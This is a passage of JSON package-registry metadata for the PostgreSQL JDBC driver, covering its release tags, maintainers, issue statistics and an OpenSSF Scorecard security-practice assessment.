itHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA3/manifests"},{"name":"REL7_1_BETA2","sha":"a55bb6d16837bda30929f56c9b866bcd98ffe87f","kind":"commit","published_at":"2000-12-28T23:56:46.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA2/manifests"},{"name":"REL7_1_BETA","sha":"422287392124727a6d1520a004d6892449c3474c","kind":"commit","published_at":"2000-11-25T04:32:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA/manifests"},{"name":"REL7_0","sha":"00659bf1e495de76b0444a0baecb12516526595d","kind":"commit","published_at":"2000-05-05T07:35:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_0/manifests"},{"name":"REL6_5","sha":"a82d23e5c013587296f807ff3886359fd4941f96","kind":"commit","published_at":"1999-06-27T11:05:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL6_5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL6_5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL6_5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL6_5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL6_5/manifests"},{"name":"release-6-3","sha":"121396c2d9ba689d98fe0837be59ce628ae62c0e","kind":"commit","published_at":"1998-02-22T18:03:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/release-6-3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/release-6-3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@release-6-3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/release-6-3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/release-6-3/manifests"}]},"repo_metadata_updated_at":"2026-06-18T23:05:12.979Z","dependent_packages_count":105,"downloads":248588,"downloads_period":"total","dependent_repos_count":496,"rankings":{"downloads":3.477037483669983,"dependent_repos_count":0.2411817907747965,"dependent_packages_count":0.21103406692794696,"stargazers_count":2.140488393126319,"forks_count":2.9494523163501154,"docker_downloads_count":null,"average":1.803838810169832},"purl":"pkg:clojars/postgresql","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/clojars/postgresql","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/clojars/postgresql","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/clojars/postgresql/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-06-17T08:00:27.347Z","issues_count":373,"pull_requests_count":1208,"avg_time_to_close_issue":22926281.899328858,"avg_time_to_close_pull_request":5065332.062944163,"issues_closed_count":148,"pull_requests_closed_count":985,"pull_request_authors_count":139,"issue_authors_count":281,"avg_comments_per_issue":4.879356568364611,"avg_comments_per_pull_request":1.9594370860927153,"merged_pull_requests_count":821,"bot_issues_count":2,"bot_pull_requests_count":46,"past_year_issues_count":61,"past_year_pull_requests_count":270,"past_year_avg_time_to_close_issue":997147.7391304348,"past_year_avg_time_to_close_pull_request":778455.8911917099,"past_year_issues_closed_count":23,"past_year_pull_requests_closed_count":193,"past_year_pull_request_authors_count":27,"past_year_issue_authors_count":50,"past_year_avg_comments_per_issue":3.098360655737705,"past_year_avg_comments_per_pull_request":1.237037037037037,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":172,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/issues","maintainers":[{"login":"vlsi","count":224,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"davecramer","count":210,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"sehrope","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"jorsol","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"ringerc","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ringerc"},{"login":"bokken","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bokken"},{"login":"praiskup","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"},{"login":"pyup-bot","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pyup-bot"}],"active_maintainers":[{"login":"vlsi","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"davecramer","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"sehrope","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"jorsol","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/clojars.org/packages/postgresql/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/clojars.org/packages/postgresql/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/clojars.org/packages/postgresql/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/clojars.org/packages/postgresql/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/clojars.org/packages/postgresql/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/clojars.org/packages/postgresql/codemeta","maintainers":[{"uuid":"jkj","login":"jkj","name":null,"email":null,"url":null,"packages_count":2,"html_url":"https://clojars.org/users/jkj","role":null,"created_at":"2022-11-07T21:54:15.477Z","updated_at":"2022-11-07T21:54:15.477Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/clojars.org/maintainers/jkj/packages"}],"registry":{"name":"clojars.org","url":"https://repo.clojars.org","ecosystem":"clojars","default":true,"packages_count":22010,"maintainers_count":4614,"namespaces_count":10837,"keywords_count":3665,"github":"clojars","metadata":{"funded_packages_count":1562},"icon_url":"https://github.com/clojars.png","created_at":"2022-07-19T13:46:04.664Z","updated_at":"2026-06-10T05:20:15.595Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/clojars.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/clojars.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/clojars.org/namespaces"}},{"id":5109746,"name":"org.postgresql:postgresql","ecosystem":"maven","description":"PostgreSQL JDBC Driver Postgresql","homepage":"https://jdbc.postgresql.org","licenses":"BSD-2-Clause","normalized_licenses":["BSD-2-Clause"],"repository_url":"https://github.com/pgjdbc/pgjdbc","keywords_array":[],"namespace":"org.postgresql","versions_count":200,"first_release_published_at":"2013-04-05T16:52:35.000Z","latest_release_published_at":"2026-04-28T20:14:33.000Z","latest_release_number":"42.7.11","last_synced_at":"2026-06-18T19:13:49.643Z","created_at":"2022-07-30T20:31:34.931Z","updated_at":"2026-06-19T07:15:51.204Z","registry_url":"https://central.sonatype.com/artifact/org.postgresql/postgresql/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.postgresql/postgresql/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":2402865,"uuid":"3370128","full_name":"pgjdbc/pgjdbc","owner":"pgjdbc","description":"Postgresql JDBC Driver","archived":false,"fork":false,"pushed_at":"2026-03-14T19:19:55.000Z","size":46673,"stargazers_count":1696,"open_issues_count":622,"forks_count":924,"subscribers_count":79,"default_branch":"master","last_synced_at":"2026-03-15T03:08:24.429Z","etag":null,"topics":["java","jdbc","postgresql"],"latest_commit_sha":null,"homepage":"https://jdbc.postgresql.org/","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pgjdbc.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2012-02-06T19:30:35.000Z","updated_at":"2026-03-14T19:19:58.000Z","dependencies_parsed_at":"2023-07-05T17:00:15.760Z","dependency_job_id":"86f905c6-23fb-401f-ba06-fc529694e76e","html_url":"https://github.com/pgjdbc/pgjdbc","commit_stats":{"total_commits":3390,"total_committers":332,"mean_commits":"10.210843373493976","dds":0.8300884955752212,"last_synced_commit":"cf3d8e5ed1bca96873735a8731ed4082132361a5"},"previous_names":[],"tags_count":256,"template":false,"template_full_name":null,"purl":"pkg:github/pgjdbc/pgjdbc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/sbom","scorecard":{"id":355355,"data":{"date":"2025-08-18T08:41:38Z","repo":{"name":"github.com/pgjdbc/pgjdbc","commit":"0002d4b2e9de28af0fe0e63a5821f65ed23e245b"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":7.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 26/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 19 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'packages' permission set to 'read': .github/workflows/codeql.yml:40","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:43","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:44","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/gradle-dependency-submit.yaml:18","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release-drafter.yml:22","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:18","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/release.yml:21","Info: topLevel 'contents' permission set to 'read': .github/workflows/buildcache.yml:13","Info: topLevel permissions set to 'read-all': .github/workflows/codeql.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/debezium.yml:7","Info: topLevel 'contents' permission set to 'read': .github/workflows/fedora-copr-build.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/gradle-dependency-submit.yaml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/gradle-wrapper-validation.yml:5","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:25","Info: topLevel 'contents' permission set to 'read': .github/workflows/nightlysnapshot.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/omni.yml:39","Info: topLevel permissions set to 'read-all': .github/workflows/ossf-scorecard.yaml:20","Info: topLevel permissions set to 'read-all': .github/workflows/pgp-key-maintenance.yaml:6","Info: topLevel permissions set to 'read-all': .github/workflows/release-drafter.yml:12","Warn: no topLevel permission defined: .github/workflows/release.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:152","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:199","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:228","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:235","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:253","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:263","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/main.yml:272","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:289","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:297","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:312","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:326","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:330","Info: Possibly incomplete results: error parsing job operating system: .github/workflows/omni.yml:344","Warn: downloadThenRun not pinned by hash: .github/workflows/fedora-copr-build.yml:33","Info:  42 out of  42 GitHub-owned GitHubAction dependencies pinned","Info:  20 out of  20 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact REL42.7.7 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 not signed: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423","Warn: release artifact REL42.7.7 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/221733787","Warn: release artifact REL42.7.6 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/194763152","Warn: release artifact REL42.7.5 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/171559336","Warn: release artifact REL42.7.4 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/147455529","Warn: release artifact REL42.7.3 does not have provenance: https://api.github.com/repos/pgjdbc/pgjdbc/releases/132920423"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: BSD 2-Clause \"Simplified\" License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":3,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'master'","Info: 'allow deletion' disabled on branch 'release/42.5.x'","Info: 'allow deletion' disabled on branch 'release/42.4.x'","Info: 'allow deletion' disabled on branch 'release/42.3.x'","Info: 'force pushes' disabled on branch 'master'","Info: 'force pushes' disabled on branch 'release/42.5.x'","Info: 'force pushes' disabled on branch 'release/42.4.x'","Info: 'force pushes' disabled on branch 'release/42.3.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'master'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.5.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.4.x'","Info: 'branch protection settings apply to administrators' is required to merge on branch 'release/42.3.x'","Warn: 'stale review dismissal' is disabled on branch 'master'","Warn: 'stale review dismissal' is disabled on branch 'release/42.5.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.4.x'","Warn: 'stale review dismissal' is disabled on branch 'release/42.3.x'","Warn: branch 'master' does not require approvers","Warn: branch 'release/42.5.x' does not require approvers","Warn: branch 'release/42.4.x' does not require approvers","Warn: branch 'release/42.3.x' does not require approvers","Warn: codeowners review is not required on branch 'master'","Warn: codeowners review is not required on branch 'release/42.5.x'","Warn: codeowners review is not required on branch 'release/42.4.x'","Warn: codeowners review is not required on branch 'release/42.3.x'","Warn: 'last push approval' is disabled on branch 'master'","Warn: 'last push approval' is disabled on branch 'release/42.5.x'","Warn: 'last push approval' is disabled on branch 'release/42.4.x'","Warn: 'last push approval' is disabled on branch 'release/42.3.x'","Warn: 'up-to-date branches' is disabled on branch 'master'","Warn: 'up-to-date branches' is disabled on branch 'release/42.5.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.4.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.3.x'","Info: status check found to merge onto on branch 'master'","Info: status check found to merge onto on branch 'release/42.5.x'","Info: status check found to merge onto on branch 'release/42.4.x'","Info: status check found to merge onto on branch 'release/42.3.x'","Info: PRs are required in order to make changes on branch 'master'","Info: PRs are required in order to make changes on branch 'release/42.5.x'","Info: PRs are required in order to make changes on branch 'release/42.4.x'","Info: PRs are required in order to make changes on branch 'release/42.3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 34 contributing companies or organizations","details":["Info: found contributions from: 2ndQuadrant, AXLEproject, JavaMoney, altametris, autostyle, aws, cerner, csutils, devexp-db, edb, enterprisedb, fedora-copr, gnulib-modules, jackdb, jugnicaragua, konflux-ci, libusual, lonocloud, mend, mojohaus, netceteragroup, netcracker, ngs-doo, oracle, pgbouncer, pgjdbc, postgres, python-progress, redhatofficial, release-engineering, roiai-org, rpm-software-management, w4software, yandex"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-18T09:24:36.671Z","repository_id":2402865,"created_at":"2025-08-18T09:24:36.672Z","updated_at":"2025-08-18T09:24:36.672Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30540718,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-15T07:17:37.589Z","status":"ssl_error","status_checked_at":"2026-03-15T07:17:31.738Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pgjdbc","name":"Postgresql JDBC","uuid":"1371956","kind":"organization","description":"Official JDBC driver for PostgreSQL","email":"pgsql-jdbc@postgresql.org","website":"http://jdbc.postgresql.org","location":"Canada","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/1371956?v=4","repositories_count":12,"last_synced_at":"2025-05-18T13:01:52.520Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/pgjdbc","funding_links":[],"total_stars":2714,"followers":80,"following":0,"created_at":"2022-11-03T09:29:51.190Z","updated_at":"2025-05-18T13:01:52.520Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc/repositories"},"tags":[{"name":"REL42.7.10","sha":"27571c8e18712e7fc6a007bd38ab8e3d6c309c0c","kind":"commit","published_at":"2026-02-11T18:55:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.10/manifests"},{"name":"REL42.7.9","sha":"79b784e3a63def9d12088471334399a53016d880","kind":"commit","published_at":"2026-01-15T18:02:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.9/manifests"},{"name":"REL42.7.8","sha":"9a5492d99ce43507e318ce4bb56030f74b773d48","kind":"commit","published_at":"2025-09-18T21:10:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.8/manifests"},{"name":"REL42.7.7","sha":"9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","kind":"tag","published_at":"2025-06-11T10:13:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7/manifests"},{"name":"REL42.7.7-rc1","sha":"9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","kind":"tag","published_at":"2025-06-11T09:56:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.7-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7-rc1/manifests"},{"name":"REL42.7.6","sha":"689708f96d446993cd264cbf5bd5696a726cf8b7","kind":"tag","published_at":"2025-05-28T10:24:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6/manifests"},{"name":"REL42.7.6-rc1","sha":"689708f96d446993cd264cbf5bd5696a726cf8b7","kind":"tag","published_at":"2025-05-28T10:13:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/re